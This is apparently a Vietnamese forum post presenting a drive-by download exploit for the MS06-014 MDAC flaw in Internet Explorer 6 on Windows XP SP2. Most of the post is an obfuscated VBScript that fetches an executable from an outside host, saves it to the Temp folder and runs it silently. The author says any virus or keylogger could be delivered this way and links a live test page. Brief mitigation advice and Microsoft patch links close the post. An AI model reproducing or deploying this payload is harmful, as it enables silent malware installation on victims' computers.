[Virus] Virus gaixinh (sử dụng bug trong IE6 winxpsp2)

virus gaixinh (sử dụng bug trong IE6 winxpsp2)

Lợi dụng lỗ hỗng trên windowns xpsp2 + IE6

bug: MS06014 - IE (MDAC) remote code execution

Đây là đoạn vbscript làm lây nhiễm vào máy tinh phụ thuộc vào người viết ra nên có thể là virus, keylog hoặc bất kỳ chương trình nào

on error resume next

// Doan code sau no se download file ve de trong thu muc Temp

// Sau khi download thanh cong thi no se tu dong thuc thi

// Test xp sp2 IE6

dl = "http://www.freewebs.com/khongminh9/winontop.exe"

// Phia tren la duong dan de download file va thuc thi

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"")

a1="Ado"

a2="db."

a3="Str"

a4="eam"

str1=a1&a2&a3&a4

str5=str1

//ghep lai thanh adodb.stream

set S = df.createobject(str5,"")

S.type = 1

str6="GET"

x.Open str6, dl, False

x.Send

fname1="qu4nvu.exe"

// Ten file sau khi download ve va se dat ten la qu4nvu.exe

// Ban co de dat ten gi cung duoc vi du: keylog.exe, haha.exe

// va no nam trong thu muc C:\Documents and Settings\User\Local Settings\Temp

set F = df.createobject("Scripting.FileSystemObject","")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject("Shell.Application","")

Q.ShellExecute fname1,"","","open",0

Chỉ cần click vào link trang web cho dù .HTM hay .HTML mà có chèn đoạn vbscript trên cũng sẽ dính. Khi đã click vào link thì sẽ bị nhiễm không có hỏi gì hết nên thậm chí người dùng bị dính mà cũng không bít

Đây là bug wa' nguy hiểm với ai đang xài windows xpsp2 + IE6

Ai muốn test thử vào click vào link sau:

http://www.freewebs.com/khongminh9/Virus_enc.html

Dĩ nhiên nó chỉ vô hại không có gì hết làm 1 điều duy nhất là download file winontop.exe và thực thi (file này vô hại)

***** Khắc phục:

- sử dụng trình firefox để duyệt web (default)

- setup IDM thì khi mở link trên thì trình IDM sẽ hỏi bạn có download file không (lúc này dĩ nhiên chọn NO rồi)

- download bản fix trên microsoft:

http://www.microsoft.com/downloads/details.aspx?FamilyId=7358DA31-959C-4E3E-8...

http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

Đoàn Văn Vũ